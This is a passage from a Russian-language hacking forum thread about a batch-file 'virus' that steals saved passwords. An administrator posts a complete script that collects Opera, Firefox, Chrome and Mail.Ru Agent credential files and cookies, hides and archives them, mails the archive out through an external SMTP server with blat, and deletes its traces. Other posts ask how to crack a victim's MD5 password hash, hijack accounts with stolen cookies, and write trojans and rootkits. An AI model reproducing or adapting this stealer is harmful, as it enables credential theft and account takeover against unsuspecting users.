aza у меня нету в данный момент винды и возможности запустить сендмаил что бы поглядеть команды сэндмайла,да и времени четсно говоря в данный момент нету.
Запусти сендамил и посмотри команды на него,он должен в виде месаги выкидывать список команд,вот по этим командам и пиши.
Пример простого bat вируса,ворующего файлы с паролями.
Сообщений 61 страница 90 из 187
Поделиться612011-09-26 13:19:57
- Администратор
- Откуда: Wonderland
- Зарегистрирован: 2011-07-06
- Приглашений: 0
- Сообщений: 1264
- Уважение: [+32/-2]
- Пол: Мужской
- Провел на форуме:
1 месяц 4 дня - Последний визит:
2014-10-20 00:18:26
Поделиться622011-09-28 21:32:05
как на данный момент обстоит с расшифровкой хэшей мэйл агента, полученных из реестра? logins3 ветка? у кого-нибудь получилось?
Поделиться632011-09-28 21:48:56
ну или может есть возможность зная md5 от пароля поменять его сторонней програмкой, как было с аськой раньше в одно время? ибо прога для входа на веб-интерфейс зная мд5 есть для агента.
Поделиться642011-09-28 23:42:49
- Администратор
- Зарегистрирован: 2011-07-13
- Приглашений: 0
- Сообщений: 292
- Уважение: [+2/-0]
- Пол: Мужской
- Провел на форуме:
11 дней 13 часов - Последний визит:
2014-06-09 19:00:56
Jay_09
в этом мел агент пасс в md5?
так..
Online Reverse Hash Tool v2.5
Поделиться652011-09-29 08:42:07
- Администратор
- Откуда: Wonderland
- Зарегистрирован: 2011-07-06
- Приглашений: 0
- Сообщений: 1264
- Уважение: [+32/-2]
- Пол: Мужской
- Провел на форуме:
1 месяц 4 дня - Последний визит:
2014-10-20 00:18:26
Mail.ru Get key (Агент 5.7) .
Mail.ru History Reader 3.0.0.2
Там есть офф сайт кому нужно будет пройдётся глянет может чего нового увидет.
Поделиться662011-09-29 09:04:39
У меня всё получилось,а вот только Опера не пропускает. Пишет,что вирус. Подскажите что делать?
Поделиться672011-09-29 13:57:12
MOssWar спасибо за советы, но это пробовал уже. поиск по сайтам результата не дал, нигде такого хэша нет. Утилиту GetKey и имел ввиду, когда писал про авторизацию в браузере. Но нужен не вход на сайт под пользователем, а все таки пароль, так как войдя на сайт сменить пароль всё равно не удастся, он спрашивает текущий при внесении любых изменений. может ещё какие идеи есть? пока поставил брута, пишет через 10 дней закончит )) хэш c72fe2619c1390d93c79fb0f525c3d2e
Поделиться682011-10-02 13:04:09
всё описано нормально! Пробую...
Поделиться692011-10-10 11:34:55
- Пришедший
- Зарегистрирован: 2011-10-10
- Приглашений: 0
- Сообщений: 5
- Уважение: [+0/-0]
- Провел на форуме:
6 часов 8 минут - Последний визит:
2011-10-15 17:22:08
чуваки всем здарова у мя один не большой вопросик .... хотя нет большой но пока ответ нужен на этот вот тут чё надо писать %systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f логин@yandex.ru -u логин -pw вот там где надпись -pw пароль от почтового ящика или чё? за раннее спасибо !!
Поделиться702011-10-10 22:50:21
- Администратор
- Откуда: ПЕНТАГОН
- Зарегистрирован: 2011-07-12
- Приглашений: 2
- Сообщений: 821
- Уважение: [+15/-0]
- Пол: Мужской
- Провел на форуме:
21 день 9 часов - Последний визит:
2014-07-08 23:59:21
ANtoha пароль от почты)
Поделиться712011-10-14 23:09:00
Добрый вечер. Подскажите пожалуйста какие ещё файлы нужны для полноценной коллекции куков от google hrome по мимо файлов Cookies, Login data. Имея эти 2 файла я только могу зайти автоматически под акк жертвы на сайты где он сохранял логин и пароль, так же просмотреть логины в параметрах.... не хватает файла отвечающего за пароли...
Поделиться722011-10-16 16:53:36
Все сделал верно, когда на мыло приходят данные , открываю а там не разбериха, символы((( как исправить?
Поделиться732011-10-16 18:03:15
- Администратор
- Откуда: Wonderland
- Зарегистрирован: 2011-07-06
- Приглашений: 0
- Сообщений: 1264
- Уважение: [+32/-2]
- Пол: Мужской
- Провел на форуме:
1 месяц 4 дня - Последний визит:
2014-10-20 00:18:26
MOssWar написал(а):
Файлы которые придут на почту,можно расшифровать с помощью программы,правда не все,а только wand.dat от оперы и то если её не обновляли до 11*версий.Все остальные файлы можно расшифровать заменив на свои.
Читай внимательней.
Поделиться742011-11-03 22:07:12
- Пришедший
- Зарегистрирован: 2011-11-03
- Приглашений: 0
- Сообщений: 7
- Уважение: [+0/-0]
- Пол: Мужской
- Провел на форуме:
13 часов 53 минуты - Последний визит:
2012-06-23 00:42:49
Всем привет! Огромная просьба! помогите пожалуйста новичку в этом деле! как сделать что бы батник копировал пароли не только с Оперы и Мозиллы, а что бы еще и с Гугл Хрома? Заранее благодарю за ответ! Статья очень познавательная! Автору респект! =)
Поделиться752011-11-03 22:40:11
- Администратор
- Откуда: ПЕНТАГОН
- Зарегистрирован: 2011-07-12
- Приглашений: 2
- Сообщений: 821
- Уважение: [+15/-0]
- Пол: Мужской
- Провел на форуме:
21 день 9 часов - Последний визит:
2014-07-08 23:59:21
Raizel
на сайте есть подобный трой но на другом языке ВОТ (там хром тоже есть)
если на бате хочешь то будет вот так и хром!
Код:
@echo off md %systemroot%\wincs md %SystemDrive%\pass\ md %SystemDrive%\pass\opera\ md %SystemDrive%\pass\Mozilla\ md %SystemDrive%\pass\MailAgent\ md %SystemDrive%\pass\MailAgent\reg md %SystemDrive%\pass\chrome\ attrib %systemroot%\wincs +h +s +r attrib %SystemDrive%\pass +h +s +r copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" CD /D %APPDATA%\Opera\Opera\ copy /y wand.dat %SystemDrive%\pass\opera\wand.dat copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3 CD /D %APPDATA% Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%\Mozilla\Firefox\Profiles\*.default\ copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite cd %userprofile%\Local Settings\Application Data\Google\Chrome\User Data\Default\ copy Login* %SystemDrive%\pass\chrome\ /y copy Web* %SystemDrive%\pass\chrome\ /y copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul del /s /q %SystemRoot%\Rar.exe %SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar cd %systemroot%\wincs %systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f логин@yandex.ru -u логин -pw Пароль ren *.rar pass.rar %systemroot%\wincs\blat.exe -body FilesPassword -to логин@yandex.ru -attach %systemroot%\wincs\pass.rar rmdir /s /q %SystemDrive%\pass rmdir /s /q %systemroot%\wincs del /s /q %systemroot%\blat.exe del /s /q %systemroot%\blat.dll del /s /q %systemroot%\blat.lib attrib +a +s +h +r %systemroot%\wind.exe EXIT cls
______________________________________________________________________________________
почитай справочник по командной строке
Поделиться762011-11-04 02:19:48
- Пришедший
- Зарегистрирован: 2011-11-03
- Приглашений: 0
- Сообщений: 7
- Уважение: [+0/-0]
- Пол: Мужской
- Провел на форуме:
13 часов 53 минуты - Последний визит:
2012-06-23 00:42:49
Спасибо огромное!!! щас проверю! =)
Поделиться772011-11-05 02:15:28
- Пришедший
- Зарегистрирован: 2011-11-03
- Приглашений: 0
- Сообщений: 7
- Уважение: [+0/-0]
- Пол: Мужской
- Провел на форуме:
13 часов 53 минуты - Последний визит:
2012-06-23 00:42:49
подскажите пожалуйста, как сделать что бы батник копировал куки еще и с IE ? а то я уже все перепробывал, не знаю как правильно прописать, скорее всего не правильно указываю папку, откуда копировать... 
xcopy %userprofile%\Cookies\*.* %SystemDrive%\pass\IE\ /K /H /G /Q /R /S /Y /E >nul
или я не правильно задал начальную папку?
P.S. простите за глупые вопросы, я только учусь 
Поделиться782011-11-05 08:39:12
кто знает делфи 7
Поделиться792011-11-12 01:22:39
Подскажите пожалуйста сделал все как написано , на почту пришло но все папки пустые. Что это может быть ?
Поделиться802011-11-13 23:32:02
это значит что нубас ты))! 
Поделиться812011-11-14 08:48:15
- Администратор
- Откуда: Wonderland
- Зарегистрирован: 2011-07-06
- Приглашений: 0
- Сообщений: 1264
- Уважение: [+32/-2]
- Пол: Мужской
- Провел на форуме:
1 месяц 4 дня - Последний визит:
2014-10-20 00:18:26
Raizel написал(а):
подскажите пожалуйста, как сделать что бы батник копировал куки еще и с IE ?
на кой они нужны?)
Не ну в принципе как знаешь,пробуй xcopy "%userprofile%\Cookies\*.*" "%SystemDrive%\pass\IE\ *.*" /k /q /s /e /h /y >nul
На счет пути хз,сейчас нету возможности в винду залезть.
aza написал(а):
кто знает делфи 7
На хрена он нужен?)
Заюзай лучше ASM,на много превосходит делфи и ему подобные.
zaklepa написал(а):
Подскажите пожалуйста сделал все как написано , на почту пришло но все папки пустые. Что это может быть ?
Да хз что там у тебя может быть)
Может фаер\антивирус блокирует,а может всё таки сам в чем тупанул.
Поделиться822011-11-15 12:53:21
MOssWar
на ASM ты можеш написать троян для удаленного доступа
я видел такой троян на делфи
Поделиться832011-11-15 17:52:41
а камп поломать можно?
Поделиться842011-11-15 18:04:42
подскажите как радмином пользоватся у меня на постой пишет соединение не удалось! 
[b][/b]
Поделиться852011-11-15 19:00:09
- Администратор
- Откуда: ПЕНТАГОН
- Зарегистрирован: 2011-07-12
- Приглашений: 2
- Сообщений: 821
- Уважение: [+15/-0]
- Пол: Мужской
- Провел на форуме:
21 день 9 часов - Последний визит:
2014-07-08 23:59:21
semen еще раз увижу что флудиш на форуме то сразу бан! Правила ресурса The Hack Word
если хочешь задать вопрос то для этого тоже есть раздел можешь создать там тему!
думаю все понятно!
Поделиться862011-11-16 09:52:42
- Администратор
- Откуда: Wonderland
- Зарегистрирован: 2011-07-06
- Приглашений: 0
- Сообщений: 1264
- Уважение: [+32/-2]
- Пол: Мужской
- Провел на форуме:
1 месяц 4 дня - Последний визит:
2014-10-20 00:18:26
aza написал(а):
на ASM ты можеш написать троян для удаленного доступа
я видел такой троян на делфи
Такой троян можно написать практически на чём угодно,на асме так он будет весить раз в десять меньше чем на делфи,да вообще делфи асму не соперник.
Почётай инфы по асму,полазь по форумам программов на асме,да не только.
FASM + FASM Editor 1.0
Поделиться872011-11-17 11:29:17
MOssWar
ты посматри на исторю
асм отстал
Поделиться882011-11-18 08:24:00
- Администратор
- Откуда: Wonderland
- Зарегистрирован: 2011-07-06
- Приглашений: 0
- Сообщений: 1264
- Уважение: [+32/-2]
- Пол: Мужской
- Провел на форуме:
1 месяц 4 дня - Последний визит:
2014-10-20 00:18:26
aza написал(а):
ты посматри на исторю
асм отстал
чушь не пори,асмовские вставки используются практически во всех языках программирования,в том же делфи есть возможность использования вставки асма(или фасма),так как у асма гораздо больше возможностей чем у делфи.
По сей день на асме пишется сотни программ и вполне успешно,даже успешней чем на каком либо другом языке,просто мозгов не у всех хватает на асме царапать.
Поделиться892011-11-18 12:31:09
MOssWar
этого я не отрицаю но ты на асме хотябы попробуй написать билдер майл агента
Поделиться902011-11-18 16:28:22
- Администратор
- Откуда: Wonderland
- Зарегистрирован: 2011-07-06
- Приглашений: 0
- Сообщений: 1264
- Уважение: [+32/-2]
- Пол: Мужской
- Провел на форуме:
1 месяц 4 дня - Последний визит:
2014-10-20 00:18:26
aza а он мне нужен?))
Лучше заморочится над каким нить руткитом,чем писать какую нить хрень вроде билдера майла.
Если волнует графический интерфейс и не хватает на асм,заюзай c++,будет всё же путёвей чем делфи,вес меньше,возможностей опять же больше,хотя и на асме вполне возможно написать,не то что фейк на майла,а саму копию майла.
Или ещё какой язык,даже тот же бэйсик(правда конписация возможностей здесь будет через вставки асма),вообщем один фиг даже в этом плане делфи в подмётки не годится 
Как пример,существует не мало ОС(не говоря уже об приложениях,или каких либо программах),написанные чисто на одном ASM(включая в целом асм,то есть оринтироваясь на все разновидности его,тип NASM,TASM(извращение),FASM,MASM и т.д.
http://thehackword.ru/viewtopic.php?id=609 - в ОС есть практически всё что нужно,полностью рабочия версия и самое главное что имеет охринительный вес,графические интерфейс как пример во многом превосходят любой интерфейс майла или какого другого билдера.
http://thehackword.ru/viewtopic.php?id=610 - графический интерфейс и т.д.(пробуй такое написать на делфи,да ещё и с таким весом,за....)
http://thehackword.ru/viewtopic.php?id=611 - обрати внимание на вес.
